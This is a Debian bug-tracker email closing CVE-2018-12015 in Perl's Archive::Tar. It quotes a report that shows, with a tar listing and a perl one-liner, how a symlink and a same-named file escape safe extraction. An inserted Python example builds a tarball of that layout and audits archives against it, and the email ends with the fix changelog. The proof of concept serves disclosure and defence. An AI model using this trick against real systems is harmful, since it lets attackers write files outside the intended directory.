Your message dated Tue, 12 Jun 2018 19:33:56 +0000
with message-id <e1fsp3e-000cuj...@fasolo.debian.org>
and subject line Bug#900834: fixed in perl 5.20.2-3+deb8u11
has caused the Debian Bug report #900834,
regarding perl: CVE-2018-12015: Archive::Tar: directory traversal
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
900834: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900834
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: perl
Version: 5.26.2-5
Tags: security
By default, the Archive::Tar module doesn't allow extracting files
outside the current working directory. However, you can bypass this
secure extraction mode easily by putting a symlink and a regular file
with the same name into the tarball.
I've attached a proof-of-concept tarball, which makes Archive::Tar create
/tmp/moo regardless of what the current working directory is:
$ tar -tvvf traversal.tar.gz
lrwxrwxrwx root/root 0 2018-06-05 18:55 moo -> /tmp/moo
-rw-r--r-- root/root 4 2018-06-05 18:55 moo
$ pwd
/home/jwilk
$ ls /tmp/moo
ls: cannot access '/tmp/moo': No such file or directory
$ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'
$ ls /tmp/moo
/tmp/moo
--
Jakub Wilk
traversal.tar.gz
Description: application/gzip
--- End Message ---
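The bypass described in the report, seen from the defender's side: an added example (not part of the report, the Debian fix or Archive::Tar itself) using Python's tarfile module. It builds an in-memory tarball with the same two-member layout the report describes (constructed sample, not the attachment) and audits the member list for symlink targets outside the destination and for members that would be written through a link declared earlier in the archive; it also covers the directory-symlink variant (link `d` -> /tmp, then file `d/x`) that the report does not show.

```python
import io
import os
import posixpath
import tarfile

def _inside(dest, path):
    """True if the normalised absolute form of `path` stays within `dest`."""
    path = os.path.abspath(path)
    return path == dest or path.startswith(dest + os.sep)

def build_tar(entries):
    """Constructed in-memory .tar.gz; entries are (name, linkname_or_None, data)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, linkname, data in entries:
            info = tarfile.TarInfo(name)
            if linkname is not None:        # symlink member
                info.type, info.linkname = tarfile.SYMTYPE, linkname
                tar.addfile(info)
            else:                           # regular file member
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

# Same member layout as the report's PoC (constructed sample, not the attachment):
# a symlink 'moo' -> /tmp/moo followed by a regular file also named 'moo'.
POC_ENTRIES = [("moo", "/tmp/moo", b""), ("moo", None, b"moo\n")]

def audit_tar(tar_bytes, dest="."):
    """Return (member, reason) findings for members a naive extractor could write
    outside `dest`, including members written through a link declared earlier."""
    dest = os.path.abspath(dest)
    findings, links = [], set()
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for m in tar.getmembers():
            name = posixpath.normpath(m.name)
            if not _inside(dest, os.path.join(dest, name)):
                findings.append((m.name, "member path escapes destination"))
            if m.issym():
                base = os.path.join(dest, posixpath.dirname(name))  # link resolves from its own dir
                if not _inside(dest, os.path.join(base, m.linkname)):
                    findings.append((m.name, "symlink target escapes destination"))
            # Is the member itself, or one of its parent directories, an earlier link?
            parts = name.split("/")
            for i in range(1, len(parts) + 1):
                prefix = "/".join(parts[:i])
                if prefix in links:
                    findings.append((m.name, "written through earlier link " + prefix))
                    break
            if m.issym() or m.islnk():
                links.add(name)
    return findings
```

Python 3.12 and later provide equivalent protection natively via `extractall(filter="data")`, which rejects such links at extraction time.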
--- Begin Message ---
Source: perl
Source-Version: 5.20.2-3+deb8u11
We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 900...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Dominic Hargreaves <d...@earth.li> (supplier of updated perl package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
Format: 1.8
Date: Sun, 10 Jun 2018 18:40:37 +0100
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.20 libperl-dev perl-modules perl
Architecture: all amd64 source
Version: 5.20.2-3+deb8u11
Distribution: jessie-security
Urgency: high
Maintainer: Niko Tyni <nt...@debian.org>
Changed-By: Dominic Hargreaves <d...@earth.li>
Closes: 900834
Description:
libperl5.20 - shared Perl library
libperl-dev - Perl library: development files
perl-base - minimal Perl system
perl-debug - debug-enabled Perl interpreter
perl-doc - Perl documentation
perl - Larry Wall's Practical Extraction and Report Language
perl-modules - Core Perl modules
Changes:
perl (5.20.2-3+deb8u11) jessie-security; urgency=high
.
* [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
in Archive-Tar (Closes: #900834)
--- End Message ---